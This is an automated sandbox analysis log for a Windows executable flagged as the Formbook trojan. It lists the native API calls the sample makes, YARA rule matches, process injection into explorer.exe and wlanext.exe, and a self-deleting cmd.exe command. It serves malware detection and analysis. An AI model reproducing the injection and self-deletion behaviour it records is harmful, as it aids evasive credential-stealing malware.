Source: 0.2.tYEY1UeurGz0Mjb.exe.2d04c4c.3.raw.unpack, -Module-.cs; Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A360 NtCreateFile,3_2_0041A360
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A410 NtReadFile,3_2_0041A410
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A490 NtClose,3_2_0041A490
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A40A NtReadFile,3_2_0041A40A
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A48C NtClose,3_2_0041A48C
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_0041A53D NtAllocateVirtualMemory,3_2_0041A53D
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01A12BF0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12B60 NtClose,LdrInitializeThunk,3_2_01A12B60
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12AD0 NtReadFile,LdrInitializeThunk,3_2_01A12AD0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01A12DF0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12DD0 NtDelayExecution,LdrInitializeThunk,3_2_01A12DD0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01A12D30
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01A12D10
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01A12CA0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01A12C70
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12FB0 NtResumeThread,LdrInitializeThunk,3_2_01A12FB0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01A12F90
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12FE0 NtCreateFile,LdrInitializeThunk,3_2_01A12FE0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12F30 NtCreateSection,LdrInitializeThunk,3_2_01A12F30
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01A12EA0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01A12E80
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A14340 NtSetContextThread,3_2_01A14340
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A14650 NtSuspendThread,3_2_01A14650
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12BA0 NtEnumerateValueKey,3_2_01A12BA0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12B80 NtQueryInformationFile,3_2_01A12B80
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12BE0 NtQueryValueKey,3_2_01A12BE0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12AB0 NtWaitForSingleObject,3_2_01A12AB0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12AF0 NtWriteFile,3_2_01A12AF0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12DB0 NtEnumerateKey,3_2_01A12DB0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12D00 NtSetInformationFile,3_2_01A12D00
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12CF0 NtOpenProcess,3_2_01A12CF0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12CC0 NtQueryVirtualMemory,3_2_01A12CC0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12C00 NtQueryInformationProcess,3_2_01A12C00
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12C60 NtCreateKey,3_2_01A12C60
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12FA0 NtQuerySection,3_2_01A12FA0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12F60 NtCreateProcessEx,3_2_01A12F60
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12EE0 NtQueueApcThread,3_2_01A12EE0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A12E30 NtWriteVirtualMemory,3_2_01A12E30
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A13090 NtSetValueKey,3_2_01A13090
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A13010 NtOpenDirectoryObject,3_2_01A13010
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A135C0 NtCreateMutant,3_2_01A135C0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A139B0 NtGetContextThread,3_2_01A139B0
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A13D10 NtOpenProcessToken,3_2_01A13D10
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe; Code function: 3_2_01A13D70 NtOpenThread,3_2_01A13D70
Source: C:\Windows\explorer.exe; Code function: 4_2_107D8232 NtCreateFile,4_2_107D8232
Source: C:\Windows\explorer.exe; Code function: 4_2_107D9E12 NtProtectVirtualMemory,4_2_107D9E12
Source: C:\Windows\explorer.exe; Code function: 4_2_107D9E0A NtProtectVirtualMemory,4_2_107D9E0A
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_00FEF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,5_2_00FEF267
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632B60 NtClose,LdrInitializeThunk,5_2_03632B60
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03632BE0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03632BF0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632AD0 NtReadFile,LdrInitializeThunk,5_2_03632AD0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632F30 NtCreateSection,LdrInitializeThunk,5_2_03632F30
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632FE0 NtCreateFile,LdrInitializeThunk,5_2_03632FE0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03632EA0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03632D10
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03632DF0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632DD0 NtDelayExecution,LdrInitializeThunk,5_2_03632DD0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632C60 NtCreateKey,LdrInitializeThunk,5_2_03632C60
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03632C70
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03632CA0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_036335C0 NtCreateMutant,LdrInitializeThunk,5_2_036335C0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03634340 NtSetContextThread,5_2_03634340
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03634650 NtSuspendThread,5_2_03634650
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632BA0 NtEnumerateValueKey,5_2_03632BA0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632B80 NtQueryInformationFile,5_2_03632B80
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632AF0 NtWriteFile,5_2_03632AF0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632AB0 NtWaitForSingleObject,5_2_03632AB0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632F60 NtCreateProcessEx,5_2_03632F60
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632FA0 NtQuerySection,5_2_03632FA0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632FB0 NtResumeThread,5_2_03632FB0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632F90 NtProtectVirtualMemory,5_2_03632F90
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632E30 NtWriteVirtualMemory,5_2_03632E30
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632EE0 NtQueueApcThread,5_2_03632EE0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632E80 NtReadVirtualMemory,5_2_03632E80
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632D30 NtUnmapViewOfSection,5_2_03632D30
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632D00 NtSetInformationFile,5_2_03632D00
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632DB0 NtEnumerateKey,5_2_03632DB0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632C00 NtQueryInformationProcess,5_2_03632C00
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632CF0 NtOpenProcess,5_2_03632CF0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03632CC0 NtQueryVirtualMemory,5_2_03632CC0
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03633010 NtOpenDirectoryObject,5_2_03633010
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_03633090 NtSetValueKey,5_2_03633090
Source: C:\Windows\SysWOW64\wlanext.exe; Code function: 5_2_036339B0 NtGetContextThread,5_2_036339B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633D70 NtOpenThread,5_2_03633D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03633D10 NtOpenProcessToken,5_2_03633D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA360 NtCreateFile,5_2_00BCA360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA490 NtClose,5_2_00BCA490
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA410 NtReadFile,5_2_00BCA410
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA540 NtAllocateVirtualMemory,5_2_00BCA540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA48C NtClose,5_2_00BCA48C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA40A NtReadFile,5_2_00BCA40A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00BCA53D NtAllocateVirtualMemory,5_2_00BCA53D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_034A9BAF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,5_2_034AA036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_034A9BB2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_034AA042 NtQueryInformationProcess,5_2_034AA042
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_00FEF267: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,5_2_00FEF267
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A15130 appears 58 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A5F290 appears 105 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A4EA12 appears 86 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 01A27E54 appears 111 times
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: String function: 019CB970 appears 280 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0366EA12 appears 86 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0367F290 appears 105 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 035EB970 appears 280 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03647E54 appears 111 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03635130 appears 58 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00FE650B appears 97 times
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2003190091.0000000005640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2003859662.00000000075E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2000343305.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2001034559.0000000002CBE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000000.00000000.1981834902.00000000009AA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZrEY.exe: vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.0000000001ACD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D22000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exeBinary or memory string: OriginalFilenameZrEY.exe: vs tYEY1UeurGz0Mjb.exe
          Source: tYEY1UeurGz0Mjb.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 3.2.tYEY1UeurGz0Mjb.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 4196, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: tYEY1UeurGz0Mjb.exe PID: 1216, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: wlanext.exe PID: 3876, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Rule metadata (identical for every match listed above):
Windows_Trojan_Formbook_1112e116: reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: tYEY1UeurGz0Mjb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.SetAccessControl
Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.AddAccessRule
Source: 0.2.tYEY1UeurGz0Mjb.exe.48bfa10.6.raw.unpack, GCkChsROVbbw852kkC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, GCkChsROVbbw852kkC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.SetAccessControl
Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.AddAccessRule
Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.SetAccessControl
Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.484fdf0.5.raw.unpack, aEgGTusdp8Dk1PnDG2.cs | Security API names: _0020.AddAccessRule
Source: 0.2.tYEY1UeurGz0Mjb.exe.75e0000.9.raw.unpack, GCkChsROVbbw852kkC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tYEY1UeurGz0Mjb.exe.7310000.8.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.tYEY1UeurGz0Mjb.exe.2d4dd08.4.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: 0.2.tYEY1UeurGz0Mjb.exe.2cb6eec.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/1@13/9
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 5_2_00FE3355 memset, GetCurrentProcess, OpenProcessToken, GetLastError, AdjustTokenPrivileges, GetLastError, CloseHandle 5_2_00FE3355
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tYEY1UeurGz0Mjb.exe.log
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
Source: tYEY1UeurGz0Mjb.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tYEY1UeurGz0Mjb.exe | ReversingLabs: Detection: 31%
Source: unknown | Process created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Process created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: tYEY1UeurGz0Mjb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: tYEY1UeurGz0Mjb.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: tYEY1UeurGz0Mjb.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ZrEY.pdb source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wntdll.pdbUGP source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tYEY1UeurGz0Mjb.exe, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2048302242.000000000325A000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000003.2050405696.000000000340F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ZrEY.pdbSHA256 source: tYEY1UeurGz0Mjb.exe
          Source: Binary string: wlanext.pdbGCTL source: tYEY1UeurGz0Mjb.exe, 00000003.00000002.2048827038.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tYEY1UeurGz0Mjb.exe, 00000003.00000002.2050066314.0000000001D10000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
